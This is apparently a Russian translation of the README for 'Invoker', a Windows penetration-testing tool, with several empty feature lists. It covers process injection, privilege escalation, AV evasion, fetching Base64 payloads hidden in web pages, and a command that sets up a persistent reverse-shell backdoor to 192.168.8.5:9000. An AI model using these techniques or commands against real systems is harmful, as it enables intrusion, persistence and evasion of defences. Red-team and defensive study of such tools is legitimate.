
Утилита для тестирования на проникновение и оценки антивирусов.
Утилита для тестирования на проникновение и оценки антивирусов.
Собрана с помощью Visual Studio Community 2022 v17.5.4 (64-bit) и протестирована на Windows 10 Enterprise OS (64-bit).
Сделано в образовательных целях. Надеюсь, это поможет!
Этот репозиторий начал собирать известные сигнатуры, и у меня нет времени каждый раз загружать новые исполняемые файлы, поэтому вам следует скомпилировать этот проект самостоятельно.
Полезные сайты:
Что нужно сделать:
NtCreateProcessEx плохо работает с 32-битными процессами.Планы на будущее:
Что я учитываю при кодировании:
Все вышеперечисленное приведет к тому, что ваш PE будет иметь меньший размер и меньший процент обнаружения.
Возможности:
Проверьте библиотеку Invoker здесь. Не стесняйтесь использовать её!
Некоторые функции могут требовать прав администратора.
Некоторые функции могут не работать на Windows XP и более ранних версиях из-за используемых специфических прав доступа и флагов управления.
Запустите Invoker_x86.exe (32-бит) или Invoker_x64.exe (64-бит).
Чтобы автоматизировать бэкдор реверс-шелла с добавлением постоянства, выполните следующую команду:
Invoker_x64.exe 192.168.8.5:9000
32-битный Invoker может:
64-битный Invoker может:
Обратите внимание, что каждая техника внедрения имеет как плюсы, так и минусы; например, некоторым техникам требуется меньше прав доступа, они используют менее подозрительные методы и т.д., но могут, например, привести к краху процесса, требовать времени и других особых условий для выполнения полезной нагрузки и т.д.
Обратите внимание, что некоторые C2C-импланты могут не работать после освобождения памяти. В этом случае закомментируйте методы, такие как VirtualFreeEx, NtFreeVirtualMemory и т.д.
Повысьте привилегии, внедрив байт-код в процесс с более высокими привилегиями.
Этот инструмент может загрузить содержимое бинарного файла в память и внедрить его в запущенный процесс. Он также может анализировать HTTP-ответ и извлекать полезную нагрузку из пользовательского элемента, например, из <invoker>payload</invoker>, где payload — это бинарный код, закодированный в Base64.
Проверьте пример на pastebin.com/raw/xf9Trt0d.
Это полезно, если антивирус постоянно удаляет ваши локальные полезные нагрузки.
Проверьте дополнительный пример на pastebin.com/raw/iW17rCxH — полезная нагрузка, скрытая в элементе изображения.
P.S. Предоставленные байт-коды, скорее всего, не будут работать у вас.
Используйте ngrok, чтобы предоставить вашему локальному веб-серверу публичный адрес.
Чтобы узнать, является ли процесс 32-битным или 64-битным, откройте Диспетчер задач -> нажмите Подробнее -> перейдите на вкладку Сведения -> щелкните правой кнопкой мыши по любому столбцу -> выберите Выбрать столбцы -> отметьте флажок Платформа.
Чтобы узнать, запущен ли процесс с правами администратора, отметьте флажок Повышенный.
Узнайте, как сгенерировать полезную нагрузку реверс-шелла из моего другого проекта, а также как настроить прослушиватели Ncat и multi/handler.
Внедрение байт-кода может завершиться неудачей, поскольку байт-код может содержать плохие символы, неправильную функцию выхода или кодировку; внедрение DLL более надежно.
Если вы хотите запустить реверс- или бинд-шелл PowerShell из Invoker, откройте Invoker и запустите сеанс PowerShell, затем выполните любой из однострочников (из моего другого проекта).
Библиотека прямых системных вызовов и ассемблер были сгенерированы с помощью SysWhispers2. Автору спасибо!